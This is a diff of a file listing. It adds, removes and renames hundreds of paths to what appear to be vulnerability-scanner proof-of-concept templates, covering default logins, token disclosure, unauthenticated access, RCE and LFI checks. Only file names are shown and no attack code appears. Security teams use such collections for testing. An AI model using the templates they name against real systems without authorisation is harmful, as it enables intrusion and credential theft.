./poc/auth/hp-ilo-serial-key-disclosure-8024.yaml ./poc/auth/hp-ilo-serial-key-disclosure-8025.yaml -./poc/auth/hp-ilo-serial-key-disclosure.yaml -./poc/auth/hp-switch-default-login-8035.yaml ./poc/auth/hp-switch-default-login-8036.yaml ./poc/auth/hp-switch-default-login-8037.yaml -./poc/auth/hp-switch-default-login.yaml -./poc/auth/hpe-system-management-login-8014.yaml +./poc/auth/hp-switch-default-login-8038.yaml ./poc/auth/hpe-system-management-login-8015.yaml ./poc/auth/hpe-system-management-login-8016.yaml ./poc/auth/hpe-system-management-login.yaml @@ -2491,10 +2478,12 @@ ./poc/auth/hrsale-unauthenticated-lfi-8040.yaml ./poc/auth/hrsale-unauthenticated-lfi-8041.yaml ./poc/auth/htpasswd-detection-8045.yaml +./poc/auth/htpasswd-detection-8046.yaml ./poc/auth/htpasswd-detection.yaml ./poc/auth/htpasswd.yaml ./poc/auth/http-auth-141b1b9924040b19c483025ca3d106e1.yaml ./poc/auth/http-auth.yaml +./poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/auth/http-etcd-unauthenticated-api-data-leak-8057.yaml ./poc/auth/http-etcd-unauthenticated-api-data-leak.yaml ./poc/auth/http-username-password.yaml @@ -2506,13 +2495,13 @@ ./poc/auth/huawei-dg8045-home-gateway-password-leakage.yaml ./poc/auth/huawei-hg532e-default-router-login-8062.yaml ./poc/auth/huawei-hg532e-default-router-login-8063.yaml +./poc/auth/huawei-hg532e-default-router-login-8064.yaml ./poc/auth/huawei-router-auth-bypass-8073.yaml ./poc/auth/huawei-router-auth-bypass-8074.yaml ./poc/auth/huawei-router-auth-bypass-8075.yaml ./poc/auth/huawei-router-auth-bypass-8076.yaml ./poc/auth/hue-default-credential-8080.yaml ./poc/auth/hue-default-credential-8081.yaml -./poc/auth/hue-default-credential.yaml ./poc/auth/hue-login-panel.yaml ./poc/auth/iam-password-policy.yaml ./poc/auth/ibm-app-connect-login.yaml @@ -2521,45 +2510,41 @@ ./poc/auth/ibm-dsc-default-login.yaml ./poc/auth/ibm-hmc-default-login.yaml ./poc/auth/ibm-maximo-login.yaml -./poc/auth/ibm-mqseries-default-login-8106.yaml ./poc/auth/ibm-mqseries-default-login-8107.yaml -./poc/auth/ibm-mqseries-default-login.yaml +./poc/auth/ibm-mqseries-default-login-8108.yaml ./poc/auth/ibm-note-login-1.yaml ./poc/auth/ibm-note-login-2.yaml +./poc/auth/ibm-note-login-8110.yaml ./poc/auth/ibm-note-login-8111.yaml ./poc/auth/ibm-note-login-8112.yaml ./poc/auth/ibm-note-login.yaml ./poc/auth/ibm-signup-exposure-8119.yaml ./poc/auth/ibm-signup-exposure-8120.yaml ./poc/auth/ibm-storage-default-credential-8123.yaml +./poc/auth/ibm-storage-default-credential-8124.yaml ./poc/auth/ibm-storage-default-credential-8125.yaml -./poc/auth/ibm-storage-default-credential.yaml ./poc/auth/ibm-storage-default-password.yaml ./poc/auth/icc-pro-login.yaml ./poc/auth/icinga-web-login-8134.yaml ./poc/auth/icinga-web-login-8135.yaml ./poc/auth/icinga-web-login-8136.yaml -./poc/auth/icinga-web-login-8137.yaml ./poc/auth/icinga-web-login.yaml ./poc/auth/ictprotege-login-panel.yaml ./poc/auth/idemia-biometrics-default-credentials.yaml ./poc/auth/idemia-biometrics-default-login-8138.yaml ./poc/auth/idemia-biometrics-default-login-8139.yaml ./poc/auth/idemia-biometrics-default-login-8140.yaml -./poc/auth/idemia-biometrics-default-login.yaml +./poc/auth/idemia-biometrics-default-login-8141.yaml ./poc/auth/ikuai-login-panel.yaml ./poc/auth/imm-default-login.yaml ./poc/auth/influxdb-unauth.yaml ./poc/auth/influxdb-unauth.yml ./poc/auth/inspur-clusterengine-default-login-8162.yaml -./poc/auth/inspur-clusterengine-default-login.yaml ./poc/auth/intelbras-login-8164.yaml ./poc/auth/intelbras-login.yaml ./poc/auth/intelliflash-login-panel.yaml ./poc/auth/iptime-default-login-8192.yaml -./poc/auth/iptime-default-login-8193.yaml ./poc/auth/iptime-default-login-8194.yaml -./poc/auth/iptime-default-login.yaml ./poc/auth/issabel-login.yaml ./poc/auth/iubenda-cookie-law-solution-0f838161174c3a1452a42342cb556b62.yaml ./poc/auth/iubenda-cookie-law-solution-4353c7e138ff4cafc852aa03c1df2812.yaml @@ -2580,9 +2565,9 @@ ./poc/auth/jenkins-credentials-disclosure.yml ./poc/auth/jenkins-default-login.yaml ./poc/auth/jenkins-default-pwd.yaml -./poc/auth/jenkins-login-8277.yaml ./poc/auth/jenkins-login-8278.yaml ./poc/auth/jenkins-login-8279.yaml +./poc/auth/jenkins-login-8280.yaml ./poc/auth/jenkins-login-detection.yaml ./poc/auth/jenkins-login.yaml ./poc/auth/jenkins-token.yaml @@ -2600,7 +2585,6 @@ ./poc/auth/jinher-oa-default-login-8311.yaml ./poc/auth/jinher-oa-default-login.yaml ./poc/auth/jira-login-default.yaml -./poc/auth/jira-service-desk-signup-8317.yaml ./poc/auth/jira-service-desk-signup-8318.yaml ./poc/auth/jira-service-desk-signup-8319.yaml ./poc/auth/jira-service-desk-signup-8320.yaml @@ -2610,22 +2594,22 @@ ./poc/auth/jira-unauthenticated-dashboards-8323.yaml ./poc/auth/jira-unauthenticated-dashboards-8324.yaml ./poc/auth/jira-unauthenticated-dashboards-8325.yaml -./poc/auth/jira-unauthenticated-dashboards-8326.yaml ./poc/auth/jira-unauthenticated-dashboards-8327.yaml ./poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml ./poc/auth/jira-unauthenticated-installed-gadgets-8329.yaml +./poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml ./poc/auth/jira-unauthenticated-popular-filters-8331.yaml ./poc/auth/jira-unauthenticated-popular-filters.yaml ./poc/auth/jira-unauthenticated-projectcategories-8333.yaml ./poc/auth/jira-unauthenticated-projectcategories-8334.yaml -./poc/auth/jira-unauthenticated-projects-8335.yaml +./poc/auth/jira-unauthenticated-projectcategories.yaml ./poc/auth/jira-unauthenticated-projects-8336.yaml +./poc/auth/jira-unauthenticated-projects.yaml ./poc/auth/jira-unauthenticated-resolutions-8337.yaml ./poc/auth/jira-unauthenticated-screens-8338.yaml ./poc/auth/jira-unauthenticated-screens-8339.yaml ./poc/auth/jira-unauthenticated-user-picker-8340.yaml ./poc/auth/jira-unauthenticated-user-picker-8341.yaml -./poc/auth/jira-unauthenticated-user-picker.yaml ./poc/auth/jira-unauthenticated.yaml ./poc/auth/jmx-default-login-8354.yaml ./poc/auth/jmx-default-login-8355.yaml @@ -2635,10 +2619,10 @@ ./poc/auth/jolokia-unauthenticated-lfi-8364.yaml ./poc/auth/jolokia-unauthenticated-lfi-8365.yaml ./poc/auth/jolokia-unauthenticated-lfi-8366.yaml -./poc/auth/jolokia-unauthenticated-lfi.yaml ./poc/auth/jumpserver-unauth-rce.yaml ./poc/auth/jumpserver-unauth-rce.yml ./poc/auth/jumpserver-unauth.yaml +./poc/auth/jupyter-ipython-unauth-8402.yaml ./poc/auth/jupyter-ipython-unauth-8404.yaml ./poc/auth/jupyter-ipython-unauth-8405.yaml ./poc/auth/jupyter-ipython-unauth.yaml @@ -2660,9 +2644,8 @@ ./poc/auth/kafka-center-default-login-8415.yaml ./poc/auth/kafka-center-default-login-8416.yaml ./poc/auth/kafka-center-default-login-8417.yaml -./poc/auth/kafka-center-default-login.yaml ./poc/auth/kafka-center-default-password.yaml -./poc/auth/kafka-center-login-8419.yaml +./poc/auth/kafka-center-login-8418.yaml ./poc/auth/kafka-center-login.yaml ./poc/auth/kafka-manager-unauth.yml ./poc/auth/kakao-login-phish.yaml @@ -2670,15 +2653,16 @@ ./poc/auth/keenetic-web-login-8439.yaml ./poc/auth/keenetic-web-login-8440.yaml ./poc/auth/keenetic-web-login-8441.yaml -./poc/auth/keenetic-web-login-8443.yaml +./poc/auth/keenetic-web-login-8442.yaml ./poc/auth/keenetic-web-login.yaml ./poc/auth/kenesto-login-8445.yaml ./poc/auth/kenesto-login.yaml +./poc/auth/kentico-login-8446.yaml ./poc/auth/kentico-login-8447.yaml ./poc/auth/kentico-login.yaml ./poc/auth/key-cloak-admin-panel-2.yaml -./poc/auth/key-cloak-admin-panel-8468.yaml ./poc/auth/key-cloak-admin-panel-8469.yaml +./poc/auth/key-cloak-admin-panel-8470.yaml ./poc/auth/key-cloak-admin-panel.yaml ./poc/auth/keybase-phish.yaml ./poc/auth/keycloak-admin-panel.yaml @@ -2717,7 +2701,7 @@ ./poc/auth/kingdee-erp-getbusinessobjectdata-rce.yaml ./poc/auth/kingsoft-v8-default-password.yaml ./poc/auth/kingsoft-v8-default-password.yml -./poc/auth/kiwitcms-login-8496.yaml +./poc/auth/kiwitcms-login-8497.yaml ./poc/auth/kiwitcms-login.yaml ./poc/auth/knr-author-list-widget-8be38009c2b17ae1122861229dce91c1.yaml ./poc/auth/knr-author-list-widget-ae0eec4d1e798124605d3b7bb5ba68ee.yaml @@ -2730,15 +2714,16 @@ ./poc/auth/konga-default-jwt-key.yaml ./poc/auth/kpcms-socket-login-info-disclosure.yaml ./poc/auth/kube-api-secrets-8511.yaml +./poc/auth/kube-api-secrets-8512.yaml +./poc/auth/kube-api-secrets.yaml ./poc/auth/kubeflow-dashboard-unauth-8515.yaml ./poc/auth/kubeflow-dashboard-unauth-8517.yaml ./poc/auth/kubeflow-dashboard-unauth.yaml ./poc/auth/kubernetes-etcd-keys.yaml -./poc/auth/kubernetes-unauth(1).yaml +./poc/auth/kubernetes-unauth.yaml ./poc/auth/kubernetes-unauth.yml ./poc/auth/kyan-credential-exposure-8554.yaml -./poc/auth/kyan-credential-exposure.yaml -./poc/auth/kyan-network-credentials-disclosure-8556.yaml +./poc/auth/kyan-credential-exposure-8555.yaml ./poc/auth/kyan-network-credentials-disclosure.yaml ./poc/auth/kyan-network-monitoring-account-password-leakage.yaml ./poc/auth/kyan-network-monitoring-account-password-leakage.yml @@ -2937,7 +2922,7 @@ ./poc/auth/luci-login-detection.yaml ./poc/auth/lutron-iot-default-login-8674.yaml ./poc/auth/lutron-iot-default-login-8675.yaml -./poc/auth/lutron-iot-default-login-8677.yaml +./poc/auth/lutron-iot-default-login-8676.yaml ./poc/auth/lutron-iot-default-login-8678.yaml ./poc/auth/lutron-iot-default-login.yaml ./poc/auth/lws-hide-login-4a0fdd3939bffa759435178b943a6005.yaml @@ -2956,6 +2941,7 @@ ./poc/auth/maike-ras-cookie-bypass.yaml ./poc/auth/mailchimp-api-key-8723.yaml ./poc/auth/mailchimp-api-key-8724.yaml +./poc/auth/mailchimp-api-key-8725.yaml ./poc/auth/mailchimp-api-key-8726.yaml ./poc/auth/mailchimp-api-key.yaml ./poc/auth/mailwatch-login.yaml @@ -2965,14 +2951,13 @@ ./poc/auth/malware_cap_hookexkeylogger.yaml ./poc/auth/manageengine-keymanagerplus.yaml ./poc/auth/mantisbt-default-credential-8778.yaml -./poc/auth/mantisbt-default-credential.yaml ./poc/auth/mapbox-token-disclosure.yaml ./poc/auth/mapbox-token.yaml ./poc/auth/matomo-login-portal.yaml ./poc/auth/meks-smart-author-widget-d7cf08d050d4d9c295d6307e65c1ae52.yaml ./poc/auth/meks-smart-author-widget.yaml -./poc/auth/meshcentral-login-8801.yaml ./poc/auth/meshcentral-login-8802.yaml +./poc/auth/meshcentral-login-8803.yaml ./poc/auth/meshcentral-login.yaml ./poc/auth/metersphere-login.yaml ./poc/auth/micro-focus-ucmdb-default-credentials-8843.yaml @@ -3126,6 +3111,7 @@ ./poc/auth/nacos-user-list-unauthorized.yaml ./poc/auth/nagios-default-credential-8989.yaml ./poc/auth/nagios-default-credential.yaml +./poc/auth/nagios-default-login-8990.yaml ./poc/auth/nagios-default-login-8991.yaml ./poc/auth/nagios-default-login-8992.yaml ./poc/auth/nagios-default-login-8993.yaml @@ -3137,17 +3123,17 @@ ./poc/auth/netentsec-icg-default-password.yml ./poc/auth/netgear-router-auth-bypass-1.yaml ./poc/auth/netgear-router-auth-bypass-2.yaml -./poc/auth/netgear-router-auth-bypass-9025.yaml +./poc/auth/netgear-router-auth-bypass-9026.yaml ./poc/auth/netgear-router-auth-bypass-9027.yaml -./poc/auth/netscalar-aaa-login-9047.yaml ./poc/auth/netscalar-aaa-login-9048.yaml +./poc/auth/netscalar-aaa-login-9049.yaml ./poc/auth/netscalar-aaa-login.yaml ./poc/auth/netscaler-aaa-login-9051.yaml ./poc/auth/netscaler-aaa-login.yaml ./poc/auth/netsus-default-login-9058.yaml ./poc/auth/netsus-default-login-9059.yaml -./poc/auth/netsus-default-login.yaml -./poc/auth/netsus-server-login-9062.yaml +./poc/auth/netsus-default-login-9060.yaml +./poc/auth/netsus-server-login-9061.yaml ./poc/auth/netsus-server-login.yaml ./poc/auth/netsweeper-preauth-rce-workflow.yaml ./poc/auth/newrelic-admin-api-key-9071.yaml @@ -3160,7 +3146,6 @@ ./poc/auth/nexus-default-login-9087.yaml ./poc/auth/nexus-default-login-9088.yaml ./poc/auth/nexus-default-login-9089.yaml -./poc/auth/nexus-default-password-9091.yaml ./poc/auth/nexus-default-password.yaml ./poc/auth/nexus-default-password.yml ./poc/auth/nexus-repository-unauthentication.yaml @@ -3171,7 +3156,6 @@ ./poc/auth/nps-auth-key-unauthorized-access.yaml ./poc/auth/nps-default-login-9142.yaml ./poc/auth/nps-default-login-9143.yaml -./poc/auth/nps-default-login-9144.yaml ./poc/auth/nps-default-login-9145.yaml ./poc/auth/nps-default-login.yaml ./poc/auth/nps-default-password-9147.yaml @@ -3188,11 +3172,12 @@ ./poc/auth/nutanix-web-console-login.yaml ./poc/auth/nuuno-network-login-9160.yaml ./poc/auth/nuuno-network-login-9161.yaml +./poc/auth/nuuno-network-login-9162.yaml ./poc/auth/nuuno-network-login-9163.yaml -./poc/auth/nuuno-network-login-9164.yaml ./poc/auth/o2-default-password.yaml ./poc/auth/oauth-access-key-9184.yaml ./poc/auth/oauth-access-key-9185.yaml +./poc/auth/oauth-access-key.yaml ./poc/auth/oauth-client-cd3ce5265515419eaa2f80ce50d80c3b.yaml ./poc/auth/oauth-client-for-user-authentication-1e787d9eb928d177bffbf4da69766c02.yaml ./poc/auth/oauth-client-for-user-authentication-8b8330bacdc4e03bd13b4255b2f9c8e2.yaml @@ -3207,9 +3192,8 @@ ./poc/auth/oauth-twitter-feed-for-developers-2c4a03e880aaa9ac7d131e8aec6fd5ff.yaml ./poc/auth/oauth-twitter-feed-for-developers.yaml ./poc/auth/oauth2-detect-9180.yaml -./poc/auth/oauth2-detect-9181.yaml -./poc/auth/oauth2-detect-9182.yaml ./poc/auth/oauth2-detect-9183.yaml +./poc/auth/oauth2-detect.yaml ./poc/auth/oauth2-provider-2ae833691d89595113a94c5ad9ff28e0.yaml ./poc/auth/oauth2-provider-2c6ee8115f727f547f6e9f4733759534.yaml ./poc/auth/oauth2-provider-6202620e15a9b6f83f1b90c151c6afd5.yaml @@ -3228,17 +3212,17 @@ ./poc/auth/obf_token_smuggling.yml ./poc/auth/ocs-inventory-login.yaml ./poc/auth/octobercms-default-login-9192.yaml -./poc/auth/octobercms-default-login.yaml +./poc/auth/octobercms-default-login-9193.yaml ./poc/auth/octoprint-login-1.yaml ./poc/auth/octoprint-login-2.yaml -./poc/auth/octoprint-login-9198.yaml +./poc/auth/octoprint-login-9197.yaml ./poc/auth/octoprint-login.yaml ./poc/auth/ofbiz-default-credentials-9207.yaml ./poc/auth/ofbiz-default-credentials.yaml ./poc/auth/ofbiz-default-login-9208.yaml ./poc/auth/ofbiz-default-login-9209.yaml +./poc/auth/ofbiz-default-login-9210.yaml ./poc/auth/ofbiz-default-login-9211.yaml -./poc/auth/ofbiz-default-login.yaml ./poc/auth/ofbiz-default-password.yaml ./poc/auth/officekeeper-admin-login.yaml ./poc/auth/official-mailerlite-sign-up-forms-2cfff66bdd973664a4a41739a9cfd162.yaml @@ -3283,11 +3267,11 @@ ./poc/auth/open-stack-dashboard-login-1.yaml ./poc/auth/open-stack-dashboard-login-2.yaml ./poc/auth/open-stack-dashboard-login-9321.yaml +./poc/auth/open-stack-dashboard-login-9322.yaml ./poc/auth/open-stack-dashboard-login-9323.yaml -./poc/auth/open-stack-dashboard-login-9324.yaml ./poc/auth/open-stack-dashboard-login.yaml ./poc/auth/openai-key.yaml -./poc/auth/openbmcs-secret-disclosure.yaml +./poc/auth/openbmcs-secret-disclosure-9260.yaml ./poc/auth/openemr-default-login-9269.yaml ./poc/auth/openemr-default-login-9270.yaml ./poc/auth/openerp-default-password.yaml @@ -3297,21 +3281,21 @@ ./poc/auth/openvz-web-login.yaml ./poc/auth/openwrt-default-login-9332.yaml ./poc/auth/openwrt-default-login.yaml +./poc/auth/openwrt-login-9333.yaml ./poc/auth/openwrt-login.yaml ./poc/auth/oracle-bi-default-credentials.yaml ./poc/auth/oracle-business-intelligence-password.yaml ./poc/auth/oracle-ebs-credentials-9364.yaml -./poc/auth/oracle-ebs-credentials-9365.yaml ./poc/auth/oracle-ebs-credentials-9366.yaml ./poc/auth/oracle-ebs-credentials-disclosure-9363.yaml ./poc/auth/oracle-ebs-credentials-disclosure.yaml +./poc/auth/oracle-ebs-credentials.yaml ./poc/auth/oracle-enterprise-manager-login.yaml ./poc/auth/oracle-people-sign-in.yaml ./poc/auth/orbiteam-bscw-server-unauthenticated-lfi.yaml ./poc/auth/ov3-online-administration-unauthenticated-lfi.yaml ./poc/auth/paloalto-networks-sso.yaml ./poc/auth/panabit-default-login-9437.yaml -./poc/auth/panabit-default-login-9438.yaml ./poc/auth/panabit-default-login-9439.yaml ./poc/auth/panabit-default-login-9440.yaml ./poc/auth/panabit-default-password-9441.yaml @@ -3320,13 +3304,13 @@ ./poc/auth/panabit-gateway-default-password.yaml ./poc/auth/panabit-gateway-default-password.yml ./poc/auth/panabit-ixcache-default-login-9443.yaml +./poc/auth/panabit-ixcache-default-login.yaml ./poc/auth/panabit-ixcache-default-password.yaml ./poc/auth/panabit-ixcache-default-password.yml ./poc/auth/panos-default-credentials.yaml ./poc/auth/panos-default-login-9454.yaml ./poc/auth/panos-default-login-9455.yaml ./poc/auth/panos-default-login-9456.yaml -./poc/auth/panos-default-login.yaml ./poc/auth/papercut-missing-auth.yaml ./poc/auth/password-policy-not-set.yaml ./poc/auth/password-policy.yaml @@ -3352,10 +3336,8 @@ ./poc/auth/pentaho-cve-2021-31602-authentication-bypass.yaml ./poc/auth/pentaho-cve-2021-31602-authentication-bypass.yml ./poc/auth/pentaho-default-login-9477.yaml -./poc/auth/pentaho-default-login-9478.yaml ./poc/auth/pentaho-default-login-9479.yaml ./poc/auth/pentaho-default-login-9480.yaml -./poc/auth/pentaho-default-login.yaml ./poc/auth/peoplenet-ikey.yaml ./poc/auth/peoplesoft-default-login.yaml ./poc/auth/peters-login-redirect-099f67628707b3f385b479015262ac32.yaml @@ -3366,7 +3348,7 @@ ./poc/auth/phabricator-login.yaml ./poc/auth/phpmyadmin-default-login-extended.yaml ./poc/auth/picatic-api-key-9574.yaml -./poc/auth/pictatic-api-key-9575.yaml +./poc/auth/pictatic-api-key-9576.yaml ./poc/auth/pictatic-api-key.yaml ./poc/auth/pie-register-063c45de2e7ba6c70b70f0f7b64a907f.yaml ./poc/auth/pie-register-1e2d1b7026d2269694eb54e49db13853.yaml @@ -3402,6 +3384,7 @@ ./poc/auth/pieregister-open-redirect-9577.yaml ./poc/auth/pieregister-open-redirect-9578.yaml ./poc/auth/pieregister-open-redirect-9579.yaml +./poc/auth/pieregister-open-redirect.yaml ./poc/auth/pieregister-plugin-open-redirect.yaml ./poc/auth/pinpoint-unauth-1.yaml ./poc/auth/pinpoint-unauth-2.yaml @@ -3410,8 +3393,8 @@ ./poc/auth/plainview-protect-passwords-64631f7e755eb94d7c99500d0510ac42.yaml ./poc/auth/plainview-protect-passwords-79caa4f8ea1fa3260f686401ac5493b5.yaml ./poc/auth/plainview-protect-passwords.yaml +./poc/auth/plastic-scm-login-9591.yaml ./poc/auth/plastic-scm-login-9592.yaml -./poc/auth/plastic-scm-login-9593.yaml ./poc/auth/plastic-scm-login.yaml ./poc/auth/plesk-obsidian-login.yaml ./poc/auth/plesk-onyx-login.yaml @@ -3423,7 +3406,6 @@ ./poc/auth/polycom-login-9626.yaml ./poc/auth/polycom-login-9627.yaml ./poc/auth/polycom-login.yaml -./poc/auth/possible-AEM-secrets.yaml ./poc/auth/postgres-default-logins.yaml ./poc/auth/postgresql-empty-password.yaml ./poc/auth/postgresql-weak-password.yaml @@ -3431,7 +3413,7 @@ ./poc/auth/postman-login-check.yaml ./poc/auth/private-key (copy 1).yaml ./poc/auth/private-key-9655.yaml -./poc/auth/private-key-9657.yaml +./poc/auth/private-key-9656.yaml ./poc/auth/private-key-9658.yaml ./poc/auth/private-key-exposure-9654.yaml ./poc/auth/private-key.yaml @@ -3453,7 +3435,7 @@ ./poc/auth/pure-storage-login.yaml ./poc/auth/putty-private-key-disclosure-9729.yaml ./poc/auth/putty-private-key-disclosure-9730.yaml -./poc/auth/putty-private-key-disclosure-9731.yaml +./poc/auth/putty-private-key-disclosure-9732.yaml ./poc/auth/putty-private-key-disclosure.yaml ./poc/auth/putty-user-keyfile.yaml ./poc/auth/pypi-token.yaml @@ -3486,13 +3468,14 @@ ./poc/auth/rails-secret-token-disclosure.yaml ./poc/auth/rails-secret-token.yaml ./poc/auth/rainloop-default-login-9811.yaml +./poc/auth/rainloop-default-login-9812.yaml ./poc/auth/rainloop-default-login-9813.yaml ./poc/auth/rancher-default-login-9814.yaml ./poc/auth/rancher-default-login-9815.yaml ./poc/auth/rancher-default-login-9816.yaml -./poc/auth/rancher-default-login.yaml ./poc/auth/rancher-default-password.yaml -./poc/auth/ranger-default-login.yaml +./poc/auth/ranger-default-login-9827.yaml +./poc/auth/ranger-default-login-9828.yaml ./poc/auth/raw-cookie-reuse.yaml ./poc/auth/real-cookie-banner-1dba91bdd70cfd02be29db46dcf540b8.yaml ./poc/auth/real-cookie-banner-2ba39ea793cd92ced5c4447d57e663b5.yaml @@ -3535,8 +3518,8 @@ ./poc/auth/remedy-axis-login.yaml ./poc/auth/remote-auth-timeout.yaml ./poc/auth/remote-authentication-timeout-not-set.yaml +./poc/auth/remote-ui-login-9859.yaml ./poc/auth/remote-ui-login-9860.yaml -./poc/auth/remote-ui-login-9861.yaml ./poc/auth/remote-ui-login.yaml ./poc/auth/remove-footer-credit-5bd4d1e71d43f255dd64dca60d2b58a3.yaml ./poc/auth/remove-footer-credit-75ba687f2ebdd2e6fce2334821f6685b.yaml @@ -3552,11 +3535,12 @@ ./poc/auth/retool-login.yaml ./poc/auth/ricoh-weak-password-9880.yaml ./poc/auth/ricoh-weak-password-9881.yaml -./poc/auth/ricoh-weak-password-9882.yaml ./poc/auth/ricoh-weak-password-9883.yaml +./poc/auth/ricoh-weak-password.yaml ./poc/auth/robomongo-credential-1.yaml ./poc/auth/robomongo-credential-2.yaml ./poc/auth/robomongo-credential-9884.yaml +./poc/auth/robomongo-credential-9885.yaml ./poc/auth/rockmongo-default-credentials-9896.yaml ./poc/auth/rockmongo-default-credentials.yaml ./poc/auth/rockmongo-default-login-9897.yaml @@ -3564,8 +3548,7 @@ ./poc/auth/rockmongo-default-login-9900.yaml ./poc/auth/rockmongo-default-password.yaml ./poc/auth/rockmongo-default-password.yml -./poc/auth/routeros-login-9908.yaml -./poc/auth/routeros-login.yaml +./poc/auth/routeros-login-9909.yaml ./poc/auth/rseenet-default-login-9913.yaml ./poc/auth/rseenet-default-login-9914.yaml ./poc/auth/rseenet-default-login-9915.yaml @@ -3578,7 +3561,6 @@ ./poc/auth/ruijie-eg-and-nbr-guest-auth-guestisup-rce.yaml ./poc/auth/ruijie-eg-and-nbr-local-auth-php-fileread.yaml ./poc/auth/ruijie-eg-and-nbr-login-php-infoleak-to-rce.yaml -./poc/auth/ruijie-eg-password-leak-9922.yaml ./poc/auth/ruijie-eg-password-leak-9923.yaml ./poc/auth/ruijie-eg-password-leak-9924.yaml ./poc/auth/ruijie-eg-password-leak.yaml @@ -3609,7 +3591,6 @@ ./poc/auth/samsung-wlan-default-login-10016.yaml ./poc/auth/samsung-wlan-default-login-10017.yaml ./poc/auth/samsung-wlan-default-login-10018.yaml -./poc/auth/samsung-wlan-default-login.yaml ./poc/auth/sangfor-ad-login-rce.yaml ./poc/auth/sangfor-behavior-management-or-identity-authentication-system.yaml ./poc/auth/sangfor-edr-arbitrary-admin-login.yaml @@ -3617,21 +3598,20 @@ ./poc/auth/sangfor-edr-auth-bypass-10022.yaml ./poc/auth/sangfor-edr-auth-bypass-10023.yaml ./poc/auth/sangfor-edr-auth-bypass-10024.yaml -./poc/auth/sangfor-edr-auth-bypass.yaml ./poc/auth/sangfor-report-rep-login-rce.yaml ./poc/auth/sangfor-vpn-supersession-rce.yaml ./poc/auth/sas-login-panel.yaml ./poc/auth/sauce-access-token.yaml -./poc/auth/sauter-login-10088.yaml ./poc/auth/sauter-login-10089.yaml ./poc/auth/sauter-login-10090.yaml +./poc/auth/sauter-login-10091.yaml ./poc/auth/sauter-login.yaml ./poc/auth/scriptcase-prod-login.yaml ./poc/auth/seagate-nas-login.yaml ./poc/auth/seats-login-10104.yaml ./poc/auth/seats-login-10105.yaml ./poc/auth/seats-login-10106.yaml -./poc/auth/seats-login-10108.yaml +./poc/auth/seats-login-10107.yaml ./poc/auth/seats-login.yaml ./poc/auth/secnet-ac-default-login-10113.yaml ./poc/auth/secnet-ac-default-login.yaml @@ -3672,15 +3652,14 @@ ./poc/auth/seeyon-unauth.yaml ./poc/auth/sendgrid-api-key-10140.yaml ./poc/auth/sendgrid-api-key-10141.yaml -./poc/auth/sendgrid-api-key-10142.yaml ./poc/auth/seo-panel-reset-password-xss.yaml ./poc/auth/sequoiadb-default-login-10150.yaml ./poc/auth/sequoiadb-default-login-10151.yaml ./poc/auth/sequoiadb-default-login-10152.yaml ./poc/auth/sequoiadb-login.yaml ./poc/auth/server-backup-login-10153.yaml +./poc/auth/server-backup-login-10154.yaml ./poc/auth/server-backup-login-10155.yaml -./poc/auth/server-backup-login-10156.yaml ./poc/auth/server-backup-login.yaml ./poc/auth/server-backup-manager-se-login-detect.yaml ./poc/auth/server-private-keys-1.yaml @@ -3713,7 +3692,6 @@ ./poc/auth/servicedesk-login-panel-1.yaml ./poc/auth/servicedesk-login-panel-10171.yaml ./poc/auth/servicedesk-login-panel-10172.yaml -./poc/auth/servicedesk-login-panel-10173.yaml ./poc/auth/servicedesk-login-panel-2.yaml ./poc/auth/servicedesk-login-panel.yaml ./poc/auth/servicenow-helpdesk-credential-10174.yaml @@ -3738,20 +3716,21 @@ ./poc/auth/shikongzhiyou-erp-login-fileread.yaml ./poc/auth/shikongzhiyou-login_fileread.yaml ./poc/auth/shiro-124-rememberme.yaml -./poc/auth/shopify-custom-token-11860.yaml +./poc/auth/shopify-custom-token-10198.yaml ./poc/auth/shopify-custom-token.yaml ./poc/auth/shopify-legacy-private-app-token.yaml -./poc/auth/shopify-private-token-10199.yaml ./poc/auth/shopify-private-token-11861.yaml ./poc/auth/shopify-private-token.yaml -./poc/auth/shopify-shared-secret-10200.yaml +./poc/auth/shopify-shared-secret(1).yaml ./poc/auth/shopify-shared-secret-11862.yaml ./poc/auth/shopify-shared-secret.yaml ./poc/auth/shopify-token-10205.yaml +./poc/auth/shopify-token-11863.yaml ./poc/auth/shopify-token.yaml ./poc/auth/shoppable-token-10206.yaml ./poc/auth/shoppable-token-10207.yaml ./poc/auth/shoppable-token-10208.yaml +./poc/auth/shoppable-token-10209.yaml ./poc/auth/showdoc-default-login-10219.yaml ./poc/auth/showdoc-default-login-10220.yaml ./poc/auth/showdoc-default-login-10221.yaml @@ -3792,7 +3771,6 @@ ./poc/auth/sitefinity-login-10295.yaml ./poc/auth/sitefinity-login-10296.yaml ./poc/auth/sitefinity-login-10297.yaml -./poc/auth/sitefinity-login-10298.yaml ./poc/auth/sitefinity-login-10299.yaml ./poc/auth/sitefinity-login.yaml ./poc/auth/siteomat-login-10300.yaml @@ -3806,7 +3784,6 @@ ./poc/auth/slack-api-token.yaml ./poc/auth/slack-bot-token-10310.yaml ./poc/auth/slack-bot-token-10311.yaml -./poc/auth/slack-bot-token.yaml ./poc/auth/slack-user-token-10314.yaml ./poc/auth/slack-webhook-token-10315.yaml ./poc/auth/slocum-login-10317.yaml @@ -3841,12 +3818,12 @@ ./poc/auth/somfy-login.yaml ./poc/auth/sonarqube-cred.yaml ./poc/auth/sonarqube-cve-2020-27986-unauth.yml -./poc/auth/sonarqube-login-10374.yaml ./poc/auth/sonarqube-login-10375.yaml +./poc/auth/sonarqube-login-10376.yaml ./poc/auth/sonarqube-login.yaml +./poc/auth/sonarqube-token-10380.yaml ./poc/auth/sonarqube-token-10381.yaml ./poc/auth/sonarqube-token-10382.yaml -./poc/auth/sonarqube-token.yaml ./poc/auth/sonic-wall-login.yaml ./poc/auth/sonicwall-analyzer-login.yaml ./poc/auth/sophos-xg115w-firewall-mr-10-authentication.yaml @@ -3877,17 +3854,18 @@ ./poc/auth/splunk-login-10417.yaml ./poc/auth/splunk-login-10418.yaml ./poc/auth/splunk-login-10419.yaml +./poc/auth/splunk-login-10420.yaml ./poc/auth/splunk-login.yaml ./poc/auth/spotweb-login-panel.yaml ./poc/auth/springboot-actuator-unauth.yaml ./poc/auth/springboot-env-unauth.yaml ./poc/auth/springboot-env-unauth.yml -./poc/auth/square-access-token-11867.yaml +./poc/auth/square-access-token(1).yaml ./poc/auth/square-access-token.yaml -./poc/auth/square-oauth-secret-11868.yaml +./poc/auth/square-oauth-secret(1).yaml ./poc/auth/square-oauth-secret.yaml -./poc/auth/squirrelmail-login-10519.yaml ./poc/auth/squirrelmail-login-10520.yaml 